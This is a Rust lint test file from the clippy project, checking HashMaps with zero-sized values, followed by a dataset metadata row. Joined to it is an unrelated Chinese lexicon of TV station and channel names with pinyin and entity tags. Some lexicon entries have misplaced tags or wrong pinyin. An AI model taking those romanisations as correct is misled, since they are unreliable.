#![warn(clippy::zero_sized_map_values)]
use std::collections::HashMap;
const CONST_OK: Option<HashMap<String, usize>> = None;
const CONST_NOT_OK: Option<HashMap<String, ()>> = None;
static STATIC_OK: Option<HashMap<String, usize>> = None;
static STATIC_NOT_OK: Option<HashMap<String, ()>> = None;
type OkMap = HashMap<String, usize>;
type NotOkMap = HashMap<String, ()>;
enum TestEnum {
Ok(HashMap<String, usize>),
NotOk(HashMap<String, ()>),
}
struct Test {
ok: HashMap<String, usize>,
not_ok: HashMap<String, ()>,
also_not_ok: Vec<HashMap<usize, ()>>,
}
trait TestTrait {
type Output;
fn produce_output() -> Self::Output;
fn weird_map(&self, map: HashMap<usize, ()>);
}
impl Test {
fn ok(&self) -> HashMap<String, usize> {
todo!()
}
fn not_ok(&self) -> HashMap<String, ()> {
todo!()
}
}
impl TestTrait for Test {
type Output = HashMap<String, ()>;
fn produce_output() -> Self::Output {
todo!();
}
fn weird_map(&self, map: HashMap<usize, ()>) {
todo!();
}
}
fn test(map: HashMap<String, ()>, key: &str) -> HashMap<String, ()> {
todo!();
}
fn test2(map: HashMap<String, usize>, key: &str) -> HashMap<String, usize> {
todo!();
}
fn main() {
let _: HashMap<String, ()> = HashMap::new();
let _: HashMap<String, usize> = HashMap::new();
let _: HashMap<_, _> = std::iter::empty::<(String, ())>().collect();
}
| Rust | 4 | narpfel/rust-clippy | tests/ui/zero_sized_hashmap_values.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
CJK_WORD
:entity tv_station
###### 直播电视台名称词条语料 ######
湖南卫视/ntv/hu nan wei shi/null
湖南金鹰卡通卫视/ntv/hu nan jin ying ka tong wei shi/null
北京卫视/ntv/bei jing wei shi/null
北京卡酷动画卫视/ntv/bei jing ka ku wei shi/null
天津卫视/ntv/tian jing wei shi/null
河北卫视/ntv/he bei wei shi/null
河南卫视/ntv/he nan wei shi/null
湖北卫视/ntv/hu bei wei shi/null
江西卫视/ntv/jiang xi wei shi/null
福建东南卫视/ntv/fu jian dong nan wei shi/null
福建海峡卫视/ntv/fu jiang hai xia wei shi/null
厦门卫视/ntv/xia men wei shi/null
广东卫视/ntv/guang dong wei shi/null
广东南方卫视/ntv/guang dong nan fang wei shi/null
广东嘉佳卡通卫视/ntv/guang dong jia jia wei shi/null
深圳卫视/ntv/shen zhen wei shi/null
海南旅游卫视/ntv/hai nan lv you wei shi/null
旅游卫视/ntv/lv you wei shi/null
广西卫视/ntv/guang xi wei shi/null
云南卫视/ntv/yun nan wei shi/null
四川卫视/ntv/si chuan wei shi/null
重庆卫视/ntv/chong qing wei shi/null
贵州卫视/ntv/gui zhou wei shi/null
新疆汉语卫视/ntv/xin jiang han yu wei shi/null
新疆维语卫视/ntv/xin jiang wei yu wei shi/null
新疆兵团卫视/ntv/xin jiang bing tuan wei shi/null
新疆综艺/ntv/xin jiang zong yi/null
新疆维语综艺/ntv/xin jiang wei yu zong yi/null
西藏汉语卫视/ntv/xi zang han yu wei shi/null
西藏藏语卫视/ntv/xi zang zang yu wei shi/null
青海汉语卫视/ntv/qing hai han yu wei shi/null
青海藏语卫视/ntv/qing hai zang yu wei shi/null
甘肃卫视/ntv/gan su wei shi/null
宁夏卫视/ntv/ning xia wei shi/null
内蒙古汉语卫视/ntv/nei meng gu han yu wei shi/null
内蒙古蒙语卫视/ntv/nei meng gu meng yu wei shi/null
陕西卫视/ntv/shan xi wei shi/null
山西卫视/ntv/shan xi wei shi/null
辽宁卫视/ntv/liao ning wei shi/null
吉林卫视/ntv/ji lin wei shi/null
吉林延边卫视/ntv/ji lin yan bian wei shi/null
黑龙江卫视/ntv/hei long jiang wei shi/null
山东卫视/ntv/shang dong wei shi/null
山东教育卫视/ntv/shang dong jiao yu wei shi/null
江苏卫视/ntv/jiang su wei shi/null
江苏优漫卡通卫视/ntv/jiang su you man ka tong wei shi/null
安徽卫视/ntv/an hui wei shi/null
浙江卫视/ntv/zhe jiang wei shi/null
东方卫视/ntv/dong fang wei shi/null
炫动卡通卫视/ntv/xuan dong ka tong wei shi/null
翡翠台/ntv/fei cui tai/null
澳亚卫视/ntv/ao ya wei shi/null
华娱卫视/ntv/hua yu wei shi/null
明珠台/ntv/ming zhu tai/null
国际台/ntv/guo ji tai/null
星空卫视/ntv/xing kong wei shi/null
中国电影频道/ntv/zhong guo dian ying pin dao/null
电影频道/ntv/dian ying pin dao/null
北京电视台国际频道/ntv/bei jing dian shi tai guo ji pin dao/null
江苏电视台国际频道/ntv/jiang su dian shi tai guo ji pin dao/null
重庆电视台国际频道/ntv/chong qing dian shi tai guo ji pin dao/null
福建电视台国际频道/ntv/fu jian dian shi tai guo ji pin dao/null
黄河电视台/ntv/huang he dian shi tai/null
华夏电视台/ntv/hua xia dian shi tai/null
湖南卫视国际频道/ntv/hu nan wei shi guo ji pin dao/null
浙江电视台国际频道/ntv/zhe jiang dian shi tai guo ji pin dao/null
安徽电视台国际频道/ntv/an hui dian shi tai guo ji pin dao/null
山东广播电视总台海外频道/ntv/shan dong dian shi tai hai wai pin dao/null
广东电视台珠江海外频道/ntv/guang dong dian shi tai zhu jiang hai wai pin dao/null
天津电视台国际频道/ntv/tian jin dian shi tai guo ji pin dao/null
广州电视台英文频道/ntv/guang zhou dian shi tai ying wen pin dao/null
四川电视台国际频道/ntv/si chuan dian shi tai guo ji pin dao/null
中央电视台/ntv/zhong yang dian shi tai/null
延边卫视/ntv/yan bian wei shi/null
福建卫视/ntv/fu jian wei shi/null
亚洲卫视/ntv/ya zhou wei shi/null
上海炫动卡通卫视/ntv/shang hai xuan dong qia tong wei shi/null
上海东方电视台/ntv/shang hai dong fang dian shi tai/null
cctv一/ntv/c c t v yi/null
cctv综合/ntv/c c t v zong he/null
中央一台/ntv/zhong yang yi tai/null
中央电视台综合频道/ntv/zhong yang dian shi tai zong he pin dao/null
cctv二/ntv/c c t v er/null
cctv财经/ntv/c c t v cai jing/null
中央二台/ntv/zhong yang er tai/null
中央电视台财经频道/ntv/zhong yang dian shi tai cai jing pin dao/null
cctv三/ntv/c c t v san/null
cctv综艺/ntv/c c t v zong yi/null
中央三台/ntv/zhong yang san tai/null
中央电视台综艺频道/ntv/zhong yang dian shi tai zong yi pin dao/null
cctv五/ntv/c c t v wu/null
cctv体育/ntv/c c t v ti yu/null
cctv体育频道/ntv/c c t v ti yu pin dao/null
中央五台/ntv/zhong yang wu tai/null
中央电视台体育频道/ntv/zhong yang dian shi tai ti yu pin dao/null
cctv六/ntv/c c t v liu/null
cctv电影/ntv/c c t v dian ying/null
cctv电影频道/ntv/c c t v dian ying pin dao/null
中央六台/ntv/zhong yang liu tai/null
中央电视台电影频道/ntv/zhong yang dian shi tai dian ying pin dao/null
cctv七/ntv/c c t v qi/null
cctv军事农业/ntv/c c t v jun shi nong ye/null
cctv军事农业频道/ntv/c c t v jun shi nong ye pin dao/null
cctv军事/ntv/c c t v jun shi/null
cctv军事频道/ntv/c c t v jun shi pin dao/null
cctv农业/ntv/c c t v nong ye/null
cctv农业频道/ntv/c c t v nong ye pin dao/null
中央七台/ntv/zhong yang qi tai/null
中央电视台军事农业频道/ntv/zhong yang dian shi tai jun shi nong ye pin dao/null
cctv八/ntv/c c t v ba/null
cctv电视剧/ntv/c c t v dian shi ju/null
cctv电视剧频道/ntv/c c t v dian shi ju pin dao/null
中央八台/ntv/zhong yang ba tai/null
中央电视台电视剧频道/ntv/zhong yang dian shi tai dian shi ju pin dao/null
cctv九/ntv/c c t v jiu/null
cctv纪录/ntv/c c t v ji lu/null
cctv纪录频道/ntv/c c t v ji lu pin dao/null
中央九台/ntv/zhong yang jiu tai/null
中央电视台记录频道/ntv/zhong yang dian shi tai ji lu pin dao/null
cctv十/ntv/c c t v shi/null
cctv科教/ntv/c c t v ke jiao/null
cctv科教频道/ntv/c c t v ke jiao pin dao/null
中央十台/ntv/zhong yang shi tai/null
中央电视台科教频道/ntv/zhong yang dian shi tai ke jiao pin dao/null
cctv十一/ntv/c c t v shi yi/null
cctv戏曲/ntv/c c t v xi qu/null
cctv戏曲频道/ntv/c c t v xi qu pin dao/null
中央十一台/ntv/zhong yang shi yi tai/null
中央电视台戏曲频道/ntv/zhong yang dian shi tai xi qu pin dao/null
cctv十二/ntv/c c t v shi er/null
cctv社会与法/ntv/c c t v she kuai yu fa/null
cctv社会/ntv/c c t v she kuai/null
cctv社会频道/ntv/c c t v she kuai pin dao/null
cctv法律/ntv/c c t v fa lu:/null
cctv法律频道/ntv/c c t v fa lu: pin dao/null
中央十二台/ntv/zhong yang shi er tai/null
中央电视台法律频道/ntv/zhong yang dian shi tai fa lu: pin dao/null
中央电视台社会频道/ntv/zhong yang dian shi tai she kuai pin dao/null
中央电视台社会与法频道/ntv/zhong yang dian shi tai she kuai yu fa pin dao/null
cctv十三/ntv/c c t v shi san/null
cctv新闻/ntv/c c t v xin wen/null
cctv新闻频道/ntv/c c t v xin wen pin dao/null
中央十三台/ntv/zhong yang shi san tai/null
中央电视台新闻频道/ntv/zhong yang dian shi tai xin wen pin dao/null
cctv十四/ntv/c c t v shi si/null
cctv少儿/ntv/c c t v shao r/null
cctv少儿频道/ntv/c c t v shao r pin dao/null
中央十四台/ntv/zhong yang shi si tai/null
中央电视台少儿频道/ntv/zhong yang dian shi tai shao r pin dao/null
cctv十五/ntv/c c t v shi wu/null
cctv音乐频道/ntv/c c t v yin yue pin dao/null
中央十五台/ntv/zhong yang shi wu tai/null
中央电视台音乐频道/ntv/zhong yang dian shi tai yin yue pin dao/null
cctv四/ntv/c c t v si/null
cctv中文国际/ntv/c c t v zhong wen guo ji/null
中央四台/ntv/zhong yang si tai/null
中央电视台中文国际频道/ntv/zhong yang dian shi tai zhong wen guo ji pin dao/null
cctv四美洲台/ntv/c c t v si mei zhou tai/null
cctv美洲台/ntv/c c t v mei zhou tai/null
cctv欧洲台/ntv/c c t v ou zhou tai/null
中央电视台美洲台/ntv/zhong yang dian shi tai mei zhou tai/null
中央电视台欧洲台/ntv/zhong yang dian shi tai ou zhou tai/null
cctv英语/ntv/c c t v ying yu/null
cctv英语国际频道/ntv/c c t v ying yu guo ji pin dao/null
中央电视台英文国际频道/ntv/zhong yang dian shi tai ying wen guo ji pin dao/null
cctve/ntv/c c t v e/null
cctv西班牙语/ntv/c c t v xi ban ya yu/null
cctv西班牙语频道/ntv/c c t v xi ban ya yu pin dao/null
cctv西班牙语国际频道/ntv/c c t v xi ban ya yu guo ji pin dao/null
中央电视台西班牙语国际频道/ntv/zhong yang dian shi tai xi ban ya yu guo ji pin dao/null
cctvf/ntv/c c t v f/null
cctv法语/ntv/c c t v fa yu/null
cctv法语频道/ntv/c c t v fa yu pin dao/null
cctv法语国际频道/ntv/c c t v fa yu guo ji pin dao/null
中央电视台法语国际频道/ntv/zhong yang dian shi tai fa yu guo ji pin dao/null
cctvp/ntv/c c t v p/null
cctv俄语/ntv/c c t v e yu/null
cctv俄语频道/ntv/c c t v e yu pin dao/null
cctv俄语国际频道/ntv/c c t v e yu guo ji pin dao/null
中央电视台俄语国际频道/ntv/zhong yang dian shi tai e yu guo ji pin dao/null
cctv阿拉伯语/ntv/c c t v e la bo yu/null
cctv阿拉伯语频道/ntv/c c t v e la bo yu pin dao/null
中央电视台阿拉伯语频道/ntv/zhong yang dian shi tai e la bo yu pin dao/null
中央电视台阿拉伯语国际频道/ntv/zhong yang dian shi tai e la bo yu guo ji pin dao/null
cctv证券资讯/ntv/c c t v zheng quan zi xun/null
中央电视台证券资讯/ntv/zhong yang dian shi tai zheng quan zi xun/null
cctv发现之旅/ntv/c c t v fa xian zhi lu:/null
中央电视台发现之旅/ntv/zhong yang dian shi tai fa xian zhi lu:/null
cctv中学生/ntv/c c t v zhong xue sheng/null
中央电视台中学生/ntv/zhong yang dian shi tai zhong xue sheng/null
cctv老故事/ntv/c c t v lao gu shi/null
中央电视台老故事/ntv/zhong yang dian shi tai lao gu shi/null
cctv风云剧场/ntv/c c t v feng yun ju chang/null
中央电视台风云剧场/ntv/zhong yang dian shi tai feng yun ju chang/null
cctv第一剧场/ntv/c c t v di yi ju chang/null
中央电视台第一剧场/ntv/zhong yang dian shi tai di yi ju chang/null
cctv世界地理/ntv/c c t v shi jie di li/null
中央电视台世界地理/ntv/zhong yang dian shi tai shi jie di li/null
cctv国防军事/ntv/c c t v guo fang jun shi/null
中央电视台国防军事/ntv/zhong yang dian shi tai guo fang jun shi/null
cctv女性时尚/ntv/c c t v ru xing shi shang/null
中央电视台女性时尚/ntv/zhong yang dian shi tai ru xing shi shang/null
cctv央视精品/ntv/c c t v yang shi jing pin/null
中央电视台央视精品/ntv/zhong yang dian shi tai yang shi jing pin/null
cctv风云足球/ntv/c c t v feng yun zu qiu/null
中央电视台风云足球/ntv/zhong yang dian shi tai feng yun zu qiu/null
cctv风云音乐/ntv/c c t v feng yun yin yue/null
中央电视台风云音乐/ntv/zhong yang dian shi tai feng yun yin yue/null
cctv怀旧剧场/ntv/c c t v huai jiu ju chang/null
中央电视台怀旧剧场/ntv/zhong yang dian shi tai huai jiu ju chang/null
cctv高尔夫/ntv/c c t v gao er fu/null
中央电视台高尔夫/ntv/zhong yang dian shi tai gao er fu/null
cctv网球/ntv/c c t v wang qiu/null
中央电视台网球/ntv/zhong yang dian shi tai wang qiu/null
北京电视台财经频道/ntv/bei jing dian shi tai cai jing pin dao/null
北京电视台体育频道/ntv/bei jing dian shi tai ti yu pin dao/null
长沙电视台/ntv/chang sha dian shi tai/null
长沙公共频道/ntv/chang sha gong gong pin dao/null
长沙女性频道/ntv/chang sha nv xing pin dao/null
长沙新闻频道/ntv/chang sha xin wen pin dao/null
长沙政法频道/ntv/chang sha zheng fa pin dao/null
第一财经频道/ntv/di yi cai jing pin dao/null
东风卫视/ntv/dong feng wei shi/null
东南卫视/ntv/dong nan wei shi/null
东森电视台/ntv/dong sen dian shi tai/null
翡翠卫视/ntv/fei cui wei shi/null
凤凰卫视/ntv/feng huang wei shi/null
凤凰卫视电影台/ntv/feng huang wei shi dian ying tai/null
凤凰卫视美洲台/ntv/feng huang wei shi mei zhou tai/null
凤凰卫视欧洲台/ntv/feng huang wei shi ou zhou tai/null
凤凰卫视中文台/ntv/feng huang wei shi zhong wen tai/null
凤凰卫视资讯台/ntv/feng huang wei shi zi xun tai/null
福建新闻频道/ntv/fu jian xin wen pin dao/null
广州卫视/ntv/guang zhou wei shi/null
海南卫视/ntv/hai nan wei shi/null
湖南公共频道/ntv/hu nan gong gong pin dao/null
湖南经济电视台/ntv/hu nan jing ji dian shi tai/null
湖南时尚频道/ntv/hu nan shi shang pin dao/null
湖南影视频道/ntv/hu nan ying shi pin dao/null
湖南娱乐频道/ntv/hu nan yu le pin dao/null
江苏城市频道/ntv/jiang su cheng shi pin dao/null
江苏教育频道/ntv/jiang su jiao yu pin dao/null
江苏少儿频道/ntv/jiang su shao er pin dao/null
江苏体育频道/ntv/jiang su ti yu pin dao/null
江苏影视频道/ntv/jiang su ying shi pin dao/null
昆明电视台/ntv/kun ming dian shi tai/null
南京电视台/ntv/nan jing dian shi tai/null
南京影视频道/ntv/nan jing ying shi pin dao/null
内蒙古卫视/ntv/nei meng gu wei shi/null
青海卫视/ntv/qing hai wei shi/null
上海电视台电视剧频道/ntv/shang hai dian shi tai dian shi ju pin dao/null
上海电视台纪实频道/ntv/shang hai dian shi tai ji shi pin dao/null
上海电视台生活时尚频道/ntv/shang hai dian shi tai sheng huo shi shang pin dao/null
上海电视台体育频道/ntv/shang hai dian shi tai ti yu pin dao/null
上海电视台新闻综合频道/ntv/shang hai dian shi tai xin wen zong he pin dao/null
上海东方电视台文艺频道/ntv/shang hai dong fang dian shi tai wen yi pin dao/null
上海东方电视台戏剧频道/ntv/shang hai dong fang dian shi tai xi ju pin dao/null
上海东方电视台新闻娱乐频道/ntv/shang hai dong fang dian shi tai xin wen yu le pin dao/null
上海东方电视台音乐频道/ntv/shang hai dong fang dian shi tai yin yue pin dao/null
上海卫视/ntv/shang hai wei shi/null
上海文广集团/ntv/shang hai wen guang ji tuan/null
十八频道/ntv/shi ba pin dao/null
台北国际卫星电视网/ntv/tai bei guo ji wei xing dian shi wang/null
台湾电视台/ntv/tai wan dian shi tai/null
台湾宏观卫视/ntv/tai wan hong guan wei shi/null
台湾民视/ntv/tai wan min shi/null
卫视电影台/ntv/wei shi dian ying tai/null
卫视中文台/ntv/wei shi zhong wen tai/null
武汉卫视/ntv/wu han wei shi/null
无锡城市资讯/ntv/wu xi cheng shi zi xun/null
无锡影视/ntv/wu xi ying shi/null
西藏卫视/ntv/xi zang wei shi/null
香港新知台/ntv/xiang gang xin zhi tai/null
潇湘电影频道/ntv/xiao xiang dian ying pin dao/null
新疆卫视/ntv/xin jiang wei shi/null
亚洲电视台/ntv/ya zhou dian shi tai/null
阳光卫视/ntv/yang guang wei shi/null
直播都市频道/ntv/zhi bo du shi pin dao/null
中华电视公司/ntv/zhong hua dian shi gong si/null
中天新闻台/ntv/zhong tian xin wen tai/null
中天娱乐台/ntv/zhong tian yu le tai/null
中天综合台/ntv/zhong tian zong he tai/null
中央电视台第一剧场频道/ntv/zhong yang dian shi tai di yi ju chang pin dao/null
中央电视台风云足球频道/ntv/zhong yang dian shi tai feng yun zu qiu pin dao/null
中央电视台高尔夫网球频道/ntv/zhong yang dian shi tai gao er fu wang qiu pin dao/null
中央电视台高清电视频道/ntv/zhong yang dian shi tai gao qing dian shi pin dao/null
中央电视台国际频道/ntv/zhong yang dian shi tai guo ji pin dao/null
中央电视台国家地理频道/ntv/zhong yang dian shi tai guo jia di li pin dao/null
中央电视台经济频道/ntv/zhong yang dian shi tai jing ji pin dao/null
中央电视台文艺频道/ntv/zhong yang dian shi tai wen yi pin dao/null
中央电视台西法频道/ntv/zhong yang dian shi tai xi fa pin dao/null
中央电视台英语频道/ntv/zhong yang dian shi tai ying yu pin dao/null
中央电视台中视购物/ntv/zhong yang dian shi tai zhong shi gou wu/null
########################
###### 电视台别称 ######
湖南电视台/ntv/hu nan dian shi tai/null
芒果电视台/ntv/hu nan dian shi tai/null
湖南金鹰卡通电视台/ntv/hu nan jin ying ka tong dian shi tai/null
北京卡酷动画电视台/ntv/bei jing ka ku dian shi tai/null
福建东南电视台/ntv/fu jian dong nan dian shi tai/null
福建海峡电视台/ntv/fu jian hai xia dian shi tai/null
厦门电视台/ntv/xia men dian shi tai/null
广东南方电视台/ntv/guang dong nan fang dian shi tai/null
广东嘉佳卡通电视台/ntv/guang dong jia jia qia tong dian shi tai/null
深圳电视台/ntv/shen zhen dian shi tai/null
海南旅游电视台/hai nan lv you dian shi tai/hai nan lu: you dian shi tai/null
旅游电视台/ntv/lv you dian shi tai/null
新疆汉语电视台/ntv/xin jiang hai zhu dian shi tai/null
新疆维语电视台/ntv/xin jiang wei yu dian shi tai/null
西藏汉语电视台/ntv/xi zang han yu dian shi tai/null
西藏藏语电视台/ntv/xi zang zang yu dian shi tai/null
青海汉语电视台/ntv/qing hai han yu dian shi tai/null
青海藏语电视台/ntv/qing hai zang yu dian shi tai/null
内蒙古汉语电视台/ntv/nei meng gu han yu dian shi tai/null
内蒙古蒙语电视台/ntv/nei meng gu nei meng gu yu dian shi tai/null
吉林延边电视台/ntv/ji lin yan bian dian shi tai/null
山东教育电视台/shan dong jiao yu dian shi tai/shan dong jiao yu dian shi tai/null
江苏电视台/ntv/jiang su dian shi tai/null
江苏优漫卡通电视台/ntv/jiang su you man ka tong dian shi tai/null
炫动卡通电视台/ntv/xuan dong ka tong dian shi tai/null
翡翠电视台/ntv/fei cui tai/null
澳亚电视台/ntv/ao ya dian shi tai/null
华娱电视台/ntv/hua yu dian shi tai/null
明珠电视台/ntv/ming zhu dian shi tai/null
国际电视台/ntv/gui ji dian shi tai/null
星空电视台/ntv/xing kong dian shi tai/null
中国电影电视台/ntv/zhong guo dian ying dian shi tai/null
电影电视台/ntv/dian ying dian shi tai/null
延边电视台/ntv/yan bian dian shi tai/null
上海炫动卡通电视台/shang hai xuan dong ka tong dian shi tai/shang hai xuan dong qia tong dian shi tai/null
东南电视台/ntv/dong nan dian shi tai/null
凤凰电视台/ntv/feng huang dian shi tai/null
福建新闻电视台/ntv/fu jian xin wen dian shi tai/null
广州电视台/ntv/guang zhou dian shi tai/null
湖南公共电视台/ntv/hu nan gong gong dian shi tai/null
湖南时尚电视台/ntv/hu nan shi shang dian shi tai/null
湖南影视电视台/ntv/hu nan ying shi dian shi tai/null
湖南娱乐电视台/ntv/hu nan yu le dian shi tai/null
江苏城市电视台/ntv/jiang su cheng shi dian shi tai/null
江苏教育电视台/ntv/jiang su jiao yu dian shi tai/null
江苏少儿电视台/ntv/jiang su shao er dian shi tai/null
江苏体育电视台/ntv/jiang su ti yu dian shi tai/null
江苏影视电视台/ntv/jiang su ying shi dian shi tai/null
南京影视电视台/ntv/nan jing ying shi dian shi tai/null
青海电视台/ntv/qing hai dian shi tai/null
上海电视台/ntv/shang hai dian shi tai/null
十八电视台/ntv/shi ba dian shi tai/null
台北国际卫星电视台/ntv/tai bei guo ji wei xing dian shi wang/null
台湾宏观电视台/ntv/tai wan hong guan dian shi tai/null
台湾民视电视台/ntv/tai wan min shi/null
武汉电视台/ntv/wu han dian shi tai/null
无锡城市资讯电视台/ntv/wu xi cheng shi zi xun/null
无锡影视电视台/ntv/wu xi ying shi/null
香港新知电视台/ntv/xiang gang xin zhi tai/null
潇湘电影电视台/ntv/xiao xiang dian ying dian shi tai/null
阳光电视台/ntv/yang guang dian shi tai/null
直播都市电视台/ntv/zhi bo du shi dian shi tai/null
中天新闻电视台/ntv/zhong tian xin wen dian shi tai/null
中天娱乐电视台/ntv/zhong tian yu le dian shi tai/null
中天综合电视台/ntv/zhong tian zong he dian shi tai/null
########################
###### 频道别称 ######
湖南频道/ntv/hu nan pin dao/null
湖南金鹰卡通频道/ntv/hu nan jin ying ka tong pin dao/null
北京频道/ntv/bei jing pin dao/null
北京卡酷动画频道/ntv/bei jing ka ku pin dao/null
天津频道/ntv/tian jing pin dao/null
河北频道/ntv/he bei pin dao/null
河南频道/ntv/he nan pin dao/null
湖北频道/ntv/hu bei pin dao/null
江西频道/ntv/jiang xi pin dao/null
福建东南频道/ntv/fu jian dong nan pin dao/null
福建海峡频道/ntv/fu jiang hai xia pin dao/null
厦门频道/ntv/xia men pin dao/null
广东频道/ntv/guang dong pin dao/null
广东南方频道/ntv/guang dong nan fang pin dao/null
广东嘉佳卡通频道/ntv/guang dong jia jia pin dao/null
深圳频道/ntv/shen zhen pin dao/null
海南旅游频道/ntv/hai nan lv you pin dao/null
旅游频道/ntv/lv you pin dao/null
广西频道/ntv/guang xi pin dao/null
云南频道/ntv/yun nan pin dao/null
四川频道/ntv/si chuan pin dao/null
重庆频道/ntv/chong qing pin dao/null
贵州频道/ntv/gui zhou pin dao/null
新疆汉语频道/ntv/xin jiang han yu pin dao/null
新疆维语频道/ntv/xin jiang wei yu pin dao/null
新疆兵团频道/ntv/xin jiang bing tuan pin dao/null
新疆综艺频道/ntv/xin jiang zong yi/null
西藏汉语频道/ntv/xi zang han yu pin dao/null
西藏藏语频道/ntv/xi zang zang yu pin dao/null
青海汉语频道/ntv/qing hai han yu pin dao/null
青海藏语频道/ntv/qing hai zang yu pin dao/null
甘肃频道/ntv/gan su pin dao/null
宁夏频道/ntv/ning xia pin dao/null
内蒙古汉语频道/ntv/nei meng gu han yu pin dao/null
内蒙古蒙语频道/ntv/nei meng gu meng yu pin dao/null
陕西频道/ntv/shan xi pin dao/null
山西频道/ntv/shan xi pin dao/null
辽宁频道/ntv/liao ning pin dao/null
吉林频道/ntv/ji lin pin dao/null
吉林延边频道/ntv/ji lin yan bian pin dao/null
黑龙江频道/ntv/hei long jiang pin dao/null
山东频道/ntv/shang dong pin dao/null
山东教育频道/ntv/shang dong jiao yu pin dao/null
江苏频道/ntv/jiang su pin dao/null
江苏优漫卡通频道/ntv/jiang su you man ka tong pin dao/null
安徽频道/ntv/an hui pin dao/null
浙江频道/ntv/zhe jiang pin dao/null
东方频道/ntv/dong fang pin dao/null
炫动卡通频道/ntv/xuan dong ka tong pin dao/null
澳亚频道/ntv/ao ya pin dao/null
华娱频道/ntv/hua yu pin dao/null
星空频道/ntv/xing kong pin dao/null
黄河频道/ntv/huang he pin dao/null
华夏频道/ntv/hua xia pin dao/null
中央频道/ntv/zhong yang pin dao/null
内蒙古频道/ntv/nei meng gu pin dao/null
福建频道/ntv/fu jian pin dao/null
海南频道/ntv/hai nan pin dao/null
新疆频道/ntv/xin jiang pin dao/null
西藏频道/ntv/xi zang pin dao/null
延边频道/ntv/yan bian pin dao/null
上海炫动卡通频道/ntv/shang hai xuan dong qia tong pin dao/null
上海东方频道/ntv/shang hai dong fang pin dao/null
长沙频道/ntv/chang sha pin dao/null
东风频道/ntv/dong feng pin dao/null
东南频道/ntv/dong nan pin dao/null
东森频道/ntv/dong sen pin dao/null
翡翠频道/ntv/fei cui pin dao/null
凤凰频道/ntv/feng huang pin dao/null
广州频道/ntv/guang zhou pin dao/null
昆明频道/ntv/kun ming pin dao/null
南京频道/ntv/nan jing pin dao/null
青海频道/ntv/qing hai pin dao/null
上海频道/ntv/shang hai pin dao/null
台湾频道/ntv/tai wan pin dao/null
台湾宏观频道/ntv/tai wan hong guan pin dao/null
武汉频道/ntv/wu han pin dao/null
亚洲频道/ntv/ya zhou pin dao/null
阳光频道/ntv/yang guang pin dao/null
中天新闻频道/ntv/zhong tian xin wen tai/null
中天娱乐频道/ntv/zhong tian yu le tai/null
中天综合频道/ntv/zhong tian zong he tai/null
########################
###### 台别称 ######
湖南台/ntv/hu nan tai/null
湖南金鹰卡通台/ntv/hu nan jin ying ka tong tai/null
北京台/ntv/bei jing tai/null
北京卡酷动画台/ntv/bei jing ka ku tai/null
天津台/ntv/tian jing tai/null
河北台/ntv/he bei tai/null
河南台/ntv/he nan tai/null
湖北台/ntv/hu bei tai/null
江西台/ntv/jiang xi tai/null
福建东南台/ntv/fu jian dong nan tai/null
福建海峡台/ntv/fu jiang hai xia tai/null
厦门台/ntv/xia men tai/null
广东台/ntv/guang dong tai/null
广东南方台/ntv/guang dong nan fang tai/null
广东嘉佳卡通台/ntv/guang dong jia jia tai/null
深圳台/ntv/shen zhen tai/null
海南旅游台/ntv/hai nan lv you tai/null
旅游台/ntv/lv you tai/null
广西台/ntv/guang xi tai/null
云南台/ntv/yun nan tai/null
四川台/ntv/si chuan tai/null
重庆台/ntv/chong qing tai/null
贵州台/ntv/gui zhou tai/null
新疆汉语台/ntv/xin jiang han yu tai/null
新疆维语台/ntv/xin jiang wei yu tai/null
新疆兵团台/ntv/xin jiang bing tuan tai/null
西藏汉语台/ntv/xi zang han yu tai/null
西藏藏语台/ntv/xi zang zang yu tai/null
青海汉语台/ntv/qing hai han yu tai/null
青海藏语台/ntv/qing hai zang yu tai/null
甘肃台/ntv/gan su tai/null
宁夏台/ntv/ning xia tai/null
内蒙古汉语台/ntv/nei meng gu han yu tai/null
内蒙古蒙语台/ntv/nei meng gu meng yu tai/null
陕西台/ntv/shan xi tai/null
山西台/ntv/shan xi tai/null
辽宁台/ntv/liao ning tai/null
吉林台/ntv/ji lin tai/null
吉林延边台/ntv/ji lin yan bian tai/null
黑龙江台/ntv/hei long jiang tai/null
山东台/ntv/shang dong tai/null
山东教育台/ntv/shang dong jiao yu tai/null
江苏台/ntv/jiang su tai/null
江苏优漫卡通台/ntv/jiang su you man ka tong tai/null
安徽台/ntv/an hui tai/null
浙江台/ntv/zhe jiang tai/null
东方台/ntv/dong fang tai/null
炫动卡通台/ntv/xuan dong ka tong tai/null
澳亚台/ntv/ao ya tai/null
华娱台/ntv/hua yu tai/null
星空台/ntv/xing kong tai/null
中国电影台/ntv/zhong guo dian ying tai/null
电影台/ntv/dian ying tai/null
北京国际台/ntv/bei jing guo ji tai/null
江苏国际台/ntv/jiang su guo ji tai/null
重庆国际台/ntv/chong qing guo ji tai/null
福建国际台/ntv/fu jian guo ji tai/null
黄河台/ntv/huang he tai/null
华夏台/ntv/hua xia tai/null
湖南卫视国际台/ntv/hu nan wei shi guo ji tai/null
浙江国际台/ntv/zhe jiang dian shi tai guo ji tai/null
安徽国际台/ntv/an hui dian shi tai guo ji tai/null
山东广播海外台/ntv/shan dong dian shi tai hai wai tai/null
广东珠江海外台/ntv/guang dong zhu jiang hai wai tai/null
天津国际台/ntv/tian jin guo ji tai/null
广州英文台/ntv/guang zhou ying wen tai/null
四川国际台/ntv/si chuan guo ji tai/null
中央台/ntv/zhong yang tai/null
山东电视台综艺台/ntv/shan dong dian shi tai zong yi tai/null
山东电视综艺台/ntv/shan dong dian shi zong yi tai/null
内蒙古台/ntv/nei meng gu tai/null
福建台/ntv/fu jian tai/null
海南台/ntv/hai nan tai/null
新疆台/ntv/xin jiang tai/null
西藏台/ntv/xi zang tai/null
延边台/ntv/yan bian tai/null
上海炫动卡通台/ntv/shang hai xuan dong qia tong tai/null
上海东方台/ntv/shang hai dong fang tai/null
北京电视台财经台/ntv/bei jing dian shi tai cai jing tai/null
北京电视台体育台/ntv/bei jing dian shi tai ti yu tai/null
长沙台/ntv/chang sha tai/null
长沙公共台/ntv/chang sha gong gong tai/null
长沙女性台/ntv/chang sha nv xing tai/null
长沙新闻台/ntv/chang sha xin wen tai/null
长沙政法台/ntv/chang sha zheng fa tai/null
第一财经台/ntv/di yi cai jing tai/null
东风台/ntv/dong feng tai/null
东南台/ntv/dong nan tai/null
东森台/ntv/dong sen tai/null
凤凰台/ntv/feng huang tai/null
福建新闻台/ntv/fu jian xin wen tai/null
广州台/ntv/guang zhou tai/null
湖南公共台/ntv/hu nan gong gong tai/null
湖南经济台/ntv/hu nan jing ji tai/null
